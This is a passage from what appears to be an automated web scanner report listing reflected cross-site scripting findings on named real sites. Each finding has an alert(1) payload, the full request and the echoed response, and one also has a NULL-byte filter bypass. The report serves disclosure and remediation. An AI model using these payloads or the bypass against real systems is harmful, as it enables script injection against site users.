Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:25 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10066
Content-Type: application/x-javascript
document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");
function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
if( navigator
...[SNIP]...
0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=21341037515fa3a";alert(1)//ba80aca61be\" target=\"_blank\">
...[SNIP]...
|
2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://img.mediaplex.com |
| Path: |
/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9293a"%3balert(1)//ef5b805385b was submitted in the mpvc parameter. This input was echoed as 9293a";alert(1)//ef5b805385b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D9293a"%3balert(1)//ef5b805385b HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:27 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10042
Content-Type: application/x-javascript
document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");
function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
if( navigator
...[SNIP]...
ZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3D9293a";alert(1)//ef5b805385bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&clickTag=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIK
...[SNIP]...
|
2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ips-invite.iperceptions.com |
| Path: |
/webValidator.aspx |
Issue detail
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0049fa0'%3balert(1)//a0cbc58a018 was submitted in the loc parameter. This input was echoed as 49fa0';alert(1)//a0cbc58a018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0'%3balert(1)//a0cbc58a018&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:59 GMT
Content-Length: 1330
var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.49fa0';alert(1)//a0cbc58a018'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0%27%3balert(1)%2f%2fa0cbc58a018&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'
...[SNIP]...
|
2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://postcalc.usps.gov |
| Path: |
/CombineScriptsHandler.ashx |
Issue detail
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c214d'%3balert(1)//ba0b57bcc30 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c214d';alert(1)//ba0b57bcc30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CombineScriptsHandler.ashx?_TSM_HiddenField_=ctl00_ToolkitScriptManager1_HiddenFieldc214d'%3balert(1)//ba0b57bcc30&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3ae2e86ef9%3a1df13a87%3afde3863c%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e HTTP/1.1
Host: postcalc.usps.gov
Proxy-Connection: keep-alive
Referer: http://postcalc.usps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_qptudbmdfb_80=ffffffff3b223e1e45525d5f4f58455e445a4a421548
|
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: application/x-javascript
Content-Length: 161049
Vary: Accept-Encoding
Cache-Control: public, max-age=3583
Expires: Tue, 06 Sep 2011 13:52:50 GMT
Date: Tue, 06 Sep 2011 12:53:07 GMT
Connection: close
//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,
...[SNIP]...
/END AjaxControlToolkit.Calendar.CalendarBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ToolkitScriptManager1_HiddenFieldc214d';alert(1)//ba0b57bcc30').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:e2e86ef9:1df13a87:fde3863c:a9a7729d:9ea3f0e2:9e8e
...[SNIP]...
|
2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://query.yahooapis.com |
| Path: |
/v1/public/yql/uhTrending/cokeTrending2 |
Issue detail
The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 155ee<script>alert(1)</script>7012a81052a was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1155ee<script>alert(1)</script>7012a81052a HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:34 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 178
YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1155ee<script>alert(1)</script>7012a81052a'"}}); |
2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://sales.liveperson.net |
| Path: |
/visitor/addons/deploy.asp |
Issue detail
The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8a937%0a857122958df was submitted in the site parameter. This input was echoed as 8a937
857122958df in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /visitor/addons/deploy.asp?site=218075578a937%0a857122958df&d_id=scottrade HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQRDBTD=EKEPPJLBDDNCLJEIBDBOFDGL; path=/
Cache-control: public, max-age=3600, s-maxage=3600
//Plugins for site 218075578a937
857122958df
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...
|
2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://show.partners-z.com |
| Path: |
/s/show |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae04b<script>alert(1)</script>6304665d48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010&ae04b<script>alert(1)</script>6304665d48a=1 HTTP/1.1
Host: show.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:18 GMT
Server: Apache/2.2.9 (Debian)
Cache-Control: max-age=0, no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 892
Content-Type: text/html; charset=UTF-8
<html><head></head><body style="width:300px;height:200px;overflow:hidden;border:0px;margin:5px;text-align:center"><div id="haiku" style="height:3em;position:relative;top:50%;margin-top:-2em; color:#D2
...[SNIP]...
ces/showcase-display-server-1.4.12/server/param_mapper.py", line 121, in convert_params
raise InvalidParameterException ("unknown parameter (%s)" % k)
InvalidParameterException: unknown parameter (ae04b<script>alert(1)</script>6304665d48a)
</div>
...[SNIP]...
|
2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78be"><script>alert(1)</script>08a96ad64a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...
|
2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf04"><script>alert(1)</script>7fa24af02aa was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3079
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:56 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
nam
...[SNIP]...
|
2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdd5"><script>alert(1)</script>2b246827237 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:52 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...
|
2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62459"><script>alert(1)</script>8a2698860bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3087
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...
|
2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.com |
| Path: |
/coupon/ |
Issue detail
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db859"><script>alert(1)</script>c1c2d326329 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:08 GMT
Server: Apache
